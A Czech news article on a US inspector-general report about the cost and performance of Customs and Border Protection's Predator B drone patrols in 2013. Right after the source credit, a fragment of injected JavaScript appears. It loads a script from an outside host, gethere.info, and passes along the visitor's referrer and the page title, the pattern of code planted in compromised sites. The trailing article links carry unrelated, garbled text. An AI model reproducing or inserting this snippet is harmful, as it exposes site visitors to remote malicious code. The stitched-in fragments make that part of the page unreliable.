UAV | UAS

Náklady na ostrahu hranice USA drony – 28 000 dolarů na jedno zatčení

Lednová zpráva generálního inspektorátu Ministerstva pro vnitřní bezpečnost se zaměřila na využívání hlídkové činnosti prováděné bezpilotními systémy při ostraze americké hranice. Údaje se týkají fiskálního roku 2013.

Zpráva konstatuje, že Úřad celní a hraniční ochrany USA (U.S. Customs and Border Protection/CBP) nesplnil v rámci programu předpokládané ukazatele. CBP uvádí cenu za jednu provozní hodinu 2 468 dolarů, podle inspektorátu je to 12 255 dolarů za hodinu, protože vedení bezpilotního programu nezapočetlo klíčové náklady v podobě platů operátorů, vybavení a režijní náklady.

Předpokládaná doba nasazení byla 16 denně, 365 dní. Ze zprávy vyplývá, že drony byly ve vzduchu pouze 22 procent z předpokládaného času. Drony měly sledovat celou jižní hranici (1 993 míl od Texasu do Kalifornie), ale většina nasazení se omezila na 100mílový úsek v Arizoně a 70 mil v Texasu. Dronům je připisována asistence pouze u 2 % zatčení.

CBP nyní provozuje 9 dronů typu Predator B, jeden byl ztracen vinou obsluhy v roce 2006. druhý spadl do moře minulý rok. Celkové náklady na pořízení a provoz 11 dronů v období 2005 – 2013 byly 360 milionu USD. Vedení programu má přitom plány na zajištění 24hodinové hlídkování po celý rok. K tomu ovšem by potřebovalo dalších 14 dronů.

Úspěšnost programu se zlepšila v roce 2013 pronájmem systému VADER (Vehicle and Dismount Exploitation Radar) od Ministerstva obrany. Druhý byl zaveden v minulém roce. Tento radar pracuje za všech povětrnostních podmínek, takže hlídkování není závislé například na mracích, které ztěžují provádění misí běžně vybavenému stroji. Což by mohlo být i vysvětlení pro relativně krátký úsek hranice, nad kterou byly drony nasazeny. Lidé z programu se ohrazují proti kalkulaci tím, že použili standardní výpočet ceny operační hodiny, kterou používá pro své účely Ministerstvo obrany.

Malá míra připsaných zatčení rovněž může souviste s tím, že drony provádějí rozsáhlou zpravodajskou činnost v okolí hranice a ne vždy musí jít primárně o sledování uprchlíků a pašeráků drog. Proto část zatčení nemusí být záměrně vykazována v souvislosti se sledování z dronů.

zdroj: CBP | CNNs.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “;

Předchozí článek

Pulau Tiga is located in a Marine Park meaning the reefs are

Další článek

This corresponds to an extremely difficult time in my life and